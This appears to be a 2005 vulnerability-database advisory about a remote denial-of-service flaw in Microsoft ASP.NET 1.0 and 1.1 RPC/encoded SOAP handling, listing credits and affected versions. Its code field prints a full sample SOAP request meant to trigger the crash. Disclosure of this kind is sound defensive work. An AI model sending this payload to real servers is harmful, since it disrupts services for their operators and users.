exploits , vulnerabilities , articles , Microsoft ASP.NET RPC/Encoded Remote Denial Of Service Vulnerability

Title	Microsoft ASP.NET RPC/Encoded Remote Denial Of Service Vulnerability
Published	2005-07-12-12:00AM
Updated	2005-07-12-02:58PM
Class	Failure to Handle Exceptional Conditions
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Bryan Sullivan <bsullivan@spidynamics.com> is credited with the discovery of this vulnerability, and Sacha Faust <sfaust@spidynamics.com> is credited for further research.
Vulnerable	Microsoft ASP.NET 1.1 SP1 Microsoft ASP.NET 1.1 Microsoft ASP.NET 1.0 SP2 Microsoft ASP.NET 1.0 SP1 Microsoft ASP.NET 1.0 Microsoft ASP.NET
Not Vulnerable
Code	An exploit is not required. The following XML request is an example of a request that may trigger this vulnerability: <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://tempuri.org/" xmlns:types="http://tempuri.org/encodedTypes" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <tns:Test> <someList href="#id1" /> </tns:Test> <tns:ArrayOfInt> <Item>0</Item> </tns:ArrayOfint> </soap:Body> </soap:Envelope>
TXT